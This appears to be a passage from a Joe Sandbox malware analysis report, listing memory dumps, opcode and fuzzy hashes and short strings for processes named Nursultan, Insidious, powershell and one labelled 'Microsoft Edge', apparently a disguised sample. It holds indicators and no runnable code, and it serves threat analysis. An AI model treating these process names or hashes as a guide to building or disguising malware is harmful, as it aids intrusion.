                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3aefc492cae208ff6db7c64d9cc930df51b7640120d1410934be3ef214b7a804
                                        • Instruction ID: b54c6fc56cd7744e30545600d4b2e763266d7e858662d4ae13de14a0febb7588
                                        • Opcode Fuzzy Hash: 3aefc492cae208ff6db7c64d9cc930df51b7640120d1410934be3ef214b7a804
                                        • Instruction Fuzzy Hash: 13E09202F1DC490FE798B5AD78993B8A3C2E7DD661F40513AD00DC338AED295C834781
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7952ce4fde5f4f0dcc5eafced7d4c79cbd69f305fee89582eee98de5cef4408
                                        • Instruction ID: 82bc3858bcf3d53bf2e271f72424d3b65db45acd85c03d8b76edb34d9bae1bef
                                        • Opcode Fuzzy Hash: e7952ce4fde5f4f0dcc5eafced7d4c79cbd69f305fee89582eee98de5cef4408
                                        • Instruction Fuzzy Hash: 7BE0C220A18D250BEB88F618A442DFDB7C1EBC8394F480468F80DC3282DE28AB8183C5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 918fa666c692cf73cb83ed4a4caf243f7a6bb8e92f2c93d798946450c6796e08
                                        • Instruction ID: f6d2c4d68b801534822c17427ca3d987f6d017bb0ac24441d3df804f7d4abebb
                                        • Opcode Fuzzy Hash: 918fa666c692cf73cb83ed4a4caf243f7a6bb8e92f2c93d798946450c6796e08
                                        • Instruction Fuzzy Hash: 16D14471D1EA8A5FF79AAB2858145B57BA0EF26B90F1801FFD00DDB0C3EA1CA805C755
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a21fcc956e2f0a9945267726fb74ced1139f4516becf4a33629c40cd87214c1
                                        • Instruction ID: f49558391f62e75d0be8436688347a76dd858277a94699636d3de2510dec18ba
                                        • Opcode Fuzzy Hash: 9a21fcc956e2f0a9945267726fb74ced1139f4516becf4a33629c40cd87214c1
                                        • Instruction Fuzzy Hash: 8B41B5A784E6C55FD70BAB78A8660E43F60FF13254F0D41F7D488CA0A3EE185889C75A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6f34e9349e850126ceb9a0d3cfdf88e0c33c9f0c3b13c01129413df0f9dde79
                                        • Instruction ID: 7c0b5c565dbfe082c9e56cb416085a2d282d96fc0a16ff283a46bd35f0ed9c73
                                        • Opcode Fuzzy Hash: d6f34e9349e850126ceb9a0d3cfdf88e0c33c9f0c3b13c01129413df0f9dde79
                                        • Instruction Fuzzy Hash: 8F510532E0EA8A4FE79AAB2C541167477E1FFB5A54F1801BBC04EE71D3DF14E8158249
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afa0c0c8010c3a267dd5eebec6ae808c1bcd8834ead91b8b045ae62a77c010f1
                                        • Instruction ID: fc7173677517c19de8930c4f6fb23cd93fc8e0769596eb7db2240200b2e040ee
                                        • Opcode Fuzzy Hash: afa0c0c8010c3a267dd5eebec6ae808c1bcd8834ead91b8b045ae62a77c010f1
                                        • Instruction Fuzzy Hash: 7A412632E0EA494FE7A9E72854116B477E1EF61A64F0801FBC44DE71D7EB18AC118389
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2357865998.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848d5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 623d277fce94bc01ef7e13132fc2bad701a094198156eeed20ba3a928ec69250
                                        • Instruction ID: 1146af5a149128b09cd2dec8992ce96dc55933228e23e9c3a8c334cef638efb3
                                        • Opcode Fuzzy Hash: 623d277fce94bc01ef7e13132fc2bad701a094198156eeed20ba3a928ec69250
                                        • Instruction Fuzzy Hash: F341367180EBC44FE756AB289841A527FF0EF52361F1505EFD088CB1A3D725E80AC792
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d63edab09a9d78ff6c8c73c4a6887cd59b22ecac51ee87975b409bec7f9cce1
                                        • Instruction ID: 156fb8664cd3015ab39ae557ec0b6a13af57600f1b50b2fbcc1214c6c619dad2
                                        • Opcode Fuzzy Hash: 8d63edab09a9d78ff6c8c73c4a6887cd59b22ecac51ee87975b409bec7f9cce1
                                        • Instruction Fuzzy Hash: C331A43191CA4C9FDB5CDF5C984A6A977E0FB98311F00422FE44993251CB71A8568BC2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d3cf1472d7e6a43384feb31c0ea31fa782c69f2a7861273424fa205eadfff79
                                        • Instruction ID: 221198c0acd1a1450c133e08d7f1986944967f7ced3cef9a57fd6f92ded98e19
                                        • Opcode Fuzzy Hash: 4d3cf1472d7e6a43384feb31c0ea31fa782c69f2a7861273424fa205eadfff79
                                        • Instruction Fuzzy Hash: 7C21BF32D1EA864FE3AAEB1C985117466D1FFB4A98F5901BAC00EF71D2DF18DC458249
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9740d976e6926532fcb2ed22764929aa45ad558ba86bd9d46a885478309675a
                                        • Instruction ID: d8247506b4b09aaaa2004c92fa2d6b68608a07d88d1ce6dd8df90622ef1072ac
                                        • Opcode Fuzzy Hash: b9740d976e6926532fcb2ed22764929aa45ad558ba86bd9d46a885478309675a
                                        • Instruction Fuzzy Hash: 5531063190CB4C8FDB59DFAC984A6E97BF0EB56320F04426FD048C3152DA74A456CB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16a2c96822408770a330c7838788724988adbc7ac6b9da1fb2db0555b9bc6c61
                                        • Instruction ID: 75b33324ac91af674ec0ed93e18e4a15b47e1cc4ffd969539e90a05ce4edac00
                                        • Opcode Fuzzy Hash: 16a2c96822408770a330c7838788724988adbc7ac6b9da1fb2db0555b9bc6c61
                                        • Instruction Fuzzy Hash: A311E032E0F9854FE6A4E72894545B87BE0FF60E68F5800FBD41DE71E6DB18AC108388
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M_^4$M_^7$M_^F$M_^J
                                        • API String ID: 0-622050427
                                        • Opcode ID: d48b9a86e15b6121fdbc22e503080a4e9c023ffc754724c43785c41b1f88ea82
                                        • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                        • Opcode Fuzzy Hash: d48b9a86e15b6121fdbc22e503080a4e9c023ffc754724c43785c41b1f88ea82
                                        • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04d5e059f282d00355ff3a7e736faab3d928fd4427305e647a848511af506664
                                        • Instruction ID: 3fee189d7c67a9c9ad97ef1a757163d59c7d1c429a372e373c8354614fa984b9
                                        • Opcode Fuzzy Hash: 04d5e059f282d00355ff3a7e736faab3d928fd4427305e647a848511af506664
                                        • Instruction Fuzzy Hash: 62D1A130A189298FDB98FB28C458ABE77E2FF58351F544679E42AE31D2DF34AC418744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 69c402e400290101ccd68c5a7659a002b17434a167ea99034d6bf704b29a35d3
                                        • Instruction ID: 7d9698f61d0e23abc75fbd4dce2be1ea274a9d8088cc415b526e338b90cc4133
                                        • Opcode Fuzzy Hash: 69c402e400290101ccd68c5a7659a002b17434a167ea99034d6bf704b29a35d3
                                        • Instruction Fuzzy Hash: B9412B52E0DDD29FF2597778181A1A9BBD0FF623A0F4C41B7C058760C3DF2978168295
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_L
                                        • API String ID: 0-3936452892
                                        • Opcode ID: facaa26543c6cf9a03ae3579ce909cf62f6552b8eacd88c1fcb962bcdb276cb8
                                        • Instruction ID: fe6b359de1efbb5e740cc96aab13c27353a077e86f15dc0c092c58d0cf0b6fbe
                                        • Opcode Fuzzy Hash: facaa26543c6cf9a03ae3579ce909cf62f6552b8eacd88c1fcb962bcdb276cb8
                                        • Instruction Fuzzy Hash: EFA11160E2CA495FE799EB3C94593B9BBD2FF98350F884179D00ED3282DF38A8418355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction ID: 485b6199c83ca8ceb02bf715690f9b818022f5e60476d132e234ebaeafca30b4
                                        • Opcode Fuzzy Hash: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction Fuzzy Hash: 54F01C52C4E6D16FE21A667C38710F5BFB0EF02124B0C51B7C0C896093A918A84E8359
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction ID: 7a02864a8aca2250128d72ca61e77142c7596e3d5c90d6112d33fcb1fc8b0149
                                        • Opcode Fuzzy Hash: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction Fuzzy Hash: 75412952E0DED29FF2197679181A1A9BBD0FF62360F4C81B7C058664C3EE2978168295
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 896dc11376b5d890ddd5407a39c263ab16aaab226bea0b1a69abf99a5de1e89e
                                        • Instruction ID: 9fff8ec629d5d93c964ce09006f1e7f4716661a89bc499b5d23ed6f9f15ad138
                                        • Opcode Fuzzy Hash: 896dc11376b5d890ddd5407a39c263ab16aaab226bea0b1a69abf99a5de1e89e
                                        • Instruction Fuzzy Hash: B9016812F1DDC90FE7A9F37C28AA2B56BC1FB9A650F4801B6D04CC329BED296C024351
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9bce21643b9b65a700406d9934267c5eabb8194a8c856c3c334462a35510427
                                        • Instruction ID: 37f68a4501928712e5834622393322af61c2ff4d8cc7678c481475c486cca311
                                        • Opcode Fuzzy Hash: c9bce21643b9b65a700406d9934267c5eabb8194a8c856c3c334462a35510427
                                        • Instruction Fuzzy Hash: 61F02811F1DC890FF7A8B17C24AA2B953C2FBDDAA0F840136D00DD328ADD256C424245
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8fe8fc34ab43c25fd36dd46f2841489867b29013ec378b0beee7e7fed3ed01c
                                        • Instruction ID: c7b92645ae099e7f1bb598c3cf035c35c835af90f2c0de1975ba2be5cbb9aa23
                                        • Opcode Fuzzy Hash: c8fe8fc34ab43c25fd36dd46f2841489867b29013ec378b0beee7e7fed3ed01c
                                        • Instruction Fuzzy Hash: A5F081A1E0CB650FE344B63C58564793FD0FB94680F48046ED449D7192EE28E9404389

                                        Execution Graph

                                        Execution Coverage: 14.2%
                                        Dynamic/Decrypted Code Coverage: 100%
                                        Signature Coverage: 0%
                                        Total number of Nodes: 3
                                        Total number of Limit Nodes: 0
                                        execution_graph
                                        • Node 11815: 7ff848ea7300
                                        • Node 11816: 7ff848ea730f (SendARP)
                                        • Node 11818: 7ff848ea73e8
                                        • Edges: 11815 -> 11816, 11816 -> 11818
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.2257702925.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff848e90000_Insidious.jbxd
                                        Similarity
                                        • API ID: Send
                                        • String ID:
                                        • API String ID: 121738739-0
                                        • Opcode ID: f82a148f91c231836c288e719a0e0aa8804de6d3c635c71c92eb5f56466d83ac
                                        • Instruction ID: 40d35f306e52b0f27f480c5f7ed7e599e9b67f60fa9e47f175de36d39c467cd8
                                        • Opcode Fuzzy Hash: f82a148f91c231836c288e719a0e0aa8804de6d3c635c71c92eb5f56466d83ac
                                        • Instruction Fuzzy Hash: D941F43090DB884FD719EB689C556A9BFF0FB56311F0442AFD089D7192CB346849CB92
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58e546f37947139edf19ae885e28413710dd22f4598edc7512758ad082f7bc38
                                        • Instruction ID: 21908bc88b62ad9f299c00c7f110c4c2438334cb0ca3b03c50d5990749816958
                                        • Opcode Fuzzy Hash: 58e546f37947139edf19ae885e28413710dd22f4598edc7512758ad082f7bc38
                                        • Instruction Fuzzy Hash: AED17030A1891D8FDB98FB68D498ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 9fbf6a5f1ef4b2d1b2e4c92f821f3c7170ac786fe997d8c29e400043653aaafc
                                        • Instruction ID: 9145d15a5e1ad1e246eb97e833e45eef9ed4529035604c4a28afb016837ac5ce
                                        • Opcode Fuzzy Hash: 9fbf6a5f1ef4b2d1b2e4c92f821f3c7170ac786fe997d8c29e400043653aaafc
                                        • Instruction Fuzzy Hash: 6C41C761E0DAC29FF259B7B858191A9BBD0FF627A1F0C41BBC058470D3EF2968168395
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 970f701eceb54fab2fb61d0f2da6f2ed276b4248bf3ccff726b02056b2ea2c71
                                        • Instruction ID: efc49c04aa6dc6a80f73da2e404848ce28acc6e7c440eef0cca5ac28994f1d86
                                        • Opcode Fuzzy Hash: 970f701eceb54fab2fb61d0f2da6f2ed276b4248bf3ccff726b02056b2ea2c71
                                        • Instruction Fuzzy Hash: D7A1E261E1CA495FE798EB3C98593B9BBD2FF98790F080179D40ED3282DF38A8418755
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e03b84f42f3f5077e067c7cca02b08e01b78026343ddb4a8dc31bdd6b6be88e
                                        • Instruction ID: 64f909257e596c2b490fa3ccc950f2d9dbeb9950e5c5e057606730aaeec9859e
                                        • Opcode Fuzzy Hash: 7e03b84f42f3f5077e067c7cca02b08e01b78026343ddb4a8dc31bdd6b6be88e
                                        • Instruction Fuzzy Hash: 92A1E261E1CA495FF798EB3C54993B9BBD2FB98790F08017AD40DC3282DF38A8418755
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b4c0514232fa00acf1af0d9ffeff0225002a15beb58c001bbbac070e9fde374
                                        • Instruction ID: 4644077aff73e23d8249159c6e05abcaec0c7692ca2d425f119ab95516b86dbc
                                        • Opcode Fuzzy Hash: 3b4c0514232fa00acf1af0d9ffeff0225002a15beb58c001bbbac070e9fde374
                                        • Instruction Fuzzy Hash: 48E06D02F1D8490BE698BAAC68992B863C2E7DD661B40513AD00DC338AED295C824641
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2140789676.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a813b6c27d69169afc5b8e4a89555b49665d55883754f01686b755b435edcd11
                                        • Instruction ID: 4253a0ce596fb49c2bc138c693739c639812e3b76a467dca545636027838acb4
                                        • Opcode Fuzzy Hash: a813b6c27d69169afc5b8e4a89555b49665d55883754f01686b755b435edcd11
                                        • Instruction Fuzzy Hash: 14E0CD10618D150BD7C8F5185441DBD77C1FB84394F480464F40DC3281DE289A8147C5
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3f5c68d521e927d7669ba7c0c1b4510848dd3362933ecde8c786b3fbd51db31
                                        • Instruction ID: 908c57bde6068225aaffa70607e175fbe3ad9018b704eabef95ba0a09952a7a1
                                        • Opcode Fuzzy Hash: d3f5c68d521e927d7669ba7c0c1b4510848dd3362933ecde8c786b3fbd51db31
                                        • Instruction Fuzzy Hash: 8222F121A2DE495FE798FB7884592B97BE2FF88384F440479D00EC32C6DF79A8418785
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d45f9f76ab951269ed8da6bc3908b401ed5d5b69cd0aaec036f88bf49de767fc
                                        • Instruction ID: db80c7c53e200950674c4bff8ad19782ce88d11a9a24ad10f69be75e631d25ee
                                        • Opcode Fuzzy Hash: d45f9f76ab951269ed8da6bc3908b401ed5d5b69cd0aaec036f88bf49de767fc
                                        • Instruction Fuzzy Hash: 11513220A1E6C95FDB86A7785864276BFE0EF87259F0800FBE08DC71D7EE580816C356
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 9L_^
                                        • API String ID: 0-1679237627
                                        • Opcode ID: 64e0d66575bfbc530ac9366fefbc38d14ba41daeb5e7f858f02a7a49ab212eee
                                        • Instruction ID: adbfea01f9a4c2ce32aaa1f94c76337d94867293e6b9fee10f11fce1c5ddb5dc
                                        • Opcode Fuzzy Hash: 64e0d66575bfbc530ac9366fefbc38d14ba41daeb5e7f858f02a7a49ab212eee
                                        • Instruction Fuzzy Hash: DC612662A4991A6ED709B7BCE4011FC7BA0FF853A5F584576C00CC7193CF79A4868BE8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4L_^
                                        • API String ID: 0-2524838182
                                        • Opcode ID: 82cb7162820eb1854e594c7c7ef9f3dfe7670d8abe2c37a6a9f3b3be304ece89
                                        • Instruction ID: 648cebbe9431fe621d28b2dd3ed579033d7562c72ae2921de0202ccf29c17b56
                                        • Opcode Fuzzy Hash: 82cb7162820eb1854e594c7c7ef9f3dfe7670d8abe2c37a6a9f3b3be304ece89
                                        • Instruction Fuzzy Hash: 4D514621A0EA8A5FE396B77C98162B93FE1EF86660B0940FBD08CC7193DD1C5C428756
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d96c352826e497ef5cbb64fa9311c65c043284a3f9be109934d920c9015ea4d
                                        • Instruction ID: c00e2b8be7eaab2d8cf428c9ed63e5896bb5271b23663179ab3e9a3825db7248
                                        • Opcode Fuzzy Hash: 7d96c352826e497ef5cbb64fa9311c65c043284a3f9be109934d920c9015ea4d
                                        • Instruction Fuzzy Hash: 6121A572D0DA995FE30AB7BCA8650F53BA0FF42295F0801B7C088CA1A3EE6D58068755
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9ba86a89fab70b54e08849c1b5f2327ccedbde7857ec21a8794bd99dc6d274d
                                        • Instruction ID: 358b8c289f286c212d0dddc8eaa46e40f4ccf0df1df50bb1511c5624f50136f0
                                        • Opcode Fuzzy Hash: e9ba86a89fab70b54e08849c1b5f2327ccedbde7857ec21a8794bd99dc6d274d
                                        • Instruction Fuzzy Hash: 52A13766B489166ED709BBBCF8411F97B60FF863A1F484577C148CB193CA346086CBE5
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cecb5a7b08911878f2d5b61074948a28ed4fb5ba4a8654a6acb04a52d8d53a33
                                        • Instruction ID: d95db14d4e2e920f7877c5391b935b56cac647e8491e984aa3b78b78ca40bf95
                                        • Opcode Fuzzy Hash: cecb5a7b08911878f2d5b61074948a28ed4fb5ba4a8654a6acb04a52d8d53a33
                                        • Instruction Fuzzy Hash: 08913666B489166ED708BBBCF4051F97B60FF853B5F484577C148CB193CA25A086CBE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
